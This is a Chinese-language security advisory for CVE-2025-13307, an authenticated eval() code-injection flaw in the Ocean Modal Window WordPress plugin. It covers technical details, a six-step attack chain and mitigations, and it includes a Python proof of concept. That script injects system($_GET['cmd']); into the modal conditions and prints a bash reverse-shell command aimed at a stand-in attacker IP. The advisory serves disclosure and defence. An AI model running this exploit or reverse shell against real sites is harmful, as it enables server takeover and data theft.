CVE-2025-13307: Ocean Modal Window WordPress插件远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-13307

漏洞类型

远程代码执行(RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ocean Modal Window WordPress Plugin

漏洞概述

Ocean Modal Window是WordPress平台上一款常用的弹窗插件，在2.3.3版本之前存在严重的远程代码执行漏洞。该漏洞源于插件的弹窗显示逻辑中存在不安全的eval()语句执行机制。拥有edit_pages权限的编辑者和管理员可以设置用户可控的条件参数，这些条件参数会被直接拼接到eval语句中进行执行。由于eval语句在网站的每个页面都会被执行，攻击者只需在弹窗条件中注入恶意PHP代码，即可实现远程代码执行。攻击成功后，攻击者可以在服务器上执行任意命令，包括读取敏感配置文件、植入后门、窃取数据库凭证等操作，对网站安全造成严重威胁。此漏洞CVSS评分为7.2，属于高危级别，攻击复杂度低，无需用户交互即可实现攻击。

技术细节

漏洞根源在于Ocean Modal Window插件的modal显示逻辑中使用了eval()函数来执行用户可控的条件判断语句。拥有编辑或管理权限的用户可以通过WordPress后台设置弹窗的显示条件，这些条件参数直接传递给后端的eval()函数而未进行任何安全过滤或验证。具体来说，攻击者可以在弹窗条件配置中注入PHP代码片段，如system($_GET['cmd']);，该代码会被eval()在每个页面加载时执行。由于eval()会将字符串作为PHP代码执行，攻击者只需构造特定的请求即可在服务器上执行任意系统命令。漏洞利用的关键在于：1) 需要WordPress编辑者或管理员账户；2) 可通过后台界面修改弹窗条件；3) 注入的PHP代码通过eval()无过滤执行。此漏洞影响所有使用该插件且版本低于2.3.3的WordPress站点。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress编辑者或管理员账户凭据

STEP 2

步骤2

登录WordPress后台，访问Ocean Modal Window插件管理页面

STEP 3

步骤3

创建或编辑弹窗，在显示条件字段中注入恶意PHP代码，如system($_GET['cmd']);

STEP 4

步骤4

保存弹窗配置，恶意代码被存储到数据库并通过eval()在页面加载时执行

STEP 5

步骤5

攻击者通过构造带cmd参数的HTTP请求，在服务器上执行任意系统命令

STEP 6

步骤6

执行高危操作：读取敏感文件、植入后门、建立持久化连接或反弹shell

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13307 PoC - Ocean Modal Window RCE
# Requires WordPress Editor/Admin privileges

import requests
import re

target_url = "http://target-wordpress-site.com"
wp_admin_url = f"{target_url}/wp-admin/admin.php?page=ocean-modal-window"

# Authentication (Editor or Admin account)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': wp_admin_url
}

# Login to WordPress
session.post(f"{target_url}/wp-login.php", data=login_data)

# Create malicious modal with RCE payload
# The payload executes system commands via eval()
rce_payload = "system($_GET['cmd']);"

modal_data = {
    'modal_title': 'Malicious Modal',
    'modal_conditions': rce_payload,  # Injected into eval()
    'modal_action': 'save'
}

# Save the malicious modal
response = session.post(wp_admin_url, data=modal_data)

# Trigger RCE by accessing any page with cmd parameter
if 'success' in response.text or response.status_code == 200:
    print("[+] Malicious modal created successfully")
    print("[+] Trigger RCE via: " + target_url + "/?cmd=whoami")
else:
    print("[-] Failed to create modal")

# Alternative: Direct command execution after modal creation
print(f"[*] Execute commands: {target_url}/?cmd=id")
print(f"[*] Reverse shell: {target_url}/?cmd=bash -i >& /dev/tcp/attacker-ip/4444 0>&1")

影响范围

Ocean Modal Window WordPress Plugin < 2.3.3

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：1) 临时禁用Ocean Modal Window插件；2) 限制edit_pages能力的使用范围；3) 通过Web应用防火墙规则阻止包含可疑PHP代码的请求；4) 加强WordPress后台访问控制，使用双因素认证；5) 监控服务器日志，关注异常的eval()执行和系统命令调用。